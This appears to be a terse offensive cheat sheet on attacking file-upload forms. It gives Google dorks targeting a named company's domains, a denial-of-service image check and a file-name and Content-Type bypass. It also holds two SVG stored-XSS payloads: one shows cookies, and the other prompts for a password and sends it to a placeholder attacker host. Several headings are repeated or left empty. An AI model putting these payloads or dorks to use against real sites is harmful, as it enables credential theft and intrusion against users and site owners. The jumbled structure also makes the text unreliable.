👑Find file Upload to RCE

Google Dork for find File Upload Foam

site:*.tesla.com | site:*.tesla.org & intext:"choose file"

site:*.com inurl:"uploadform" 

site:*.com inurl:"uploadform" filetype:asp 

1

Check file Upload to RCE:

2

Check Upload to Stored-XSS:

3

Check Upload to Pixie Flood Attack:

1- Download the image file from here.

2- Upload this image to the website you are testing on.

3- If the website’s server gets timed out, it means that the server is vulnerable

4

File Upload to Stored-XSS:

Find file Upload to RCE:

File Upload to Stored-XSS:

Svg File Payload Payload

How File Name Bypass: "Fileupload.svg.png”

Change Content-Type: image/svg+xml

Svg File Payload Uploaded Here :

<?xml version=”1.0" standalone=”no”?>
<!DOCTYPE svg PUBLIC “-//W3C//DTD SVG 1.1//EN” “http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version=”1.1" baseProfile=”full” xmlns=”http://www.w3.org/2000/svg">

<polygon id=”triangle” points=”0,0 0,50 50,0" fill=”#009901" stroke=”#004400"/>

<script type=”text/javascript”>
alert(document.cookie);
</script>
</svg>

Tacking it to Credentials Theft by Modifying the Above Payload to:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>

        <script> 
                var passwd = prompt("Enter your password to continue");
                var xhr = new XMLHttpRequest();
                xhr.open("GET","https://attacker-url.com/log.php?password="+encodeURI(passwd));
                xhr.send();
        </script>

</svg>